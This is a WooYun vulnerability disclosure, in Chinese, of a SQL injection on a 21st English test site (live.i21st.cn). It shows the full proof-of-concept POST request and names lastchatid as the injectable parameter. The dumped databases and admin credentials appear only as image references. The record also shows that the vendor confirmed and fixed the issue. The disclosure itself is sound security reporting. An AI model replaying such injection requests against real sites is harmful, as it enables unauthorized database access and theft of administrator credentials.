21英语网某站SQL注入(管理员信息)

编号217595
Urlhttp://www.wooyun.org/bug.php?action=view&id=217595
漏洞状态厂商已经修复
漏洞标题21英语网某站SQL注入(管理员信息)
漏洞类型SQL注射漏洞
厂商i21st.cn
白帽子路人甲
提交日期2016-06-09 19:39:00
公开日期2016-06-10 12:07:00
修复时间2016-06-10 12:07:00
确认时间2016-06-10 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank10
漏洞简介
None
漏洞细节

POC

1、21英语网某站SQL注入,POST包如下:

POST /index.php/chat/setContent HTTP/1.1
Content-Length: 278
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://live.i21st.cn
Cookie: PHPSESSID=tvpcjk34pvb56j0mj8rd4c0994
Host: live.i21st.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
chatcontent=e&chatname=%E6%B8%B8%E5%AE%A220858467&chatuserid=20858467&imgthumb=&lastchatid=*&level=-1&masterid=29&roomid=26&sourceimg=&wordcount=


2、参数lastchatid存在问题:

1.png


3、3个库:

3.png


4、库zhibo的表信息:

5.png


5、管理员账号信息:

6.png

修复方案

状态信息 2016-06-09: 细节已通知厂商并且等待厂商处理中
2016-06-10: 厂商已经确认,细节仅向厂商公开
2016-06-10: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复测试域名,已经关闭
回应信息危害等级:中漏洞Rank:10 确认时间:2016-06-10 12:06
Showing 1-2 of 2 items.
评论内容评论人点赞数评论时间

自动化?666

默之02016-06-11 19:55:00

66

伤剑02016-06-10 13:36:00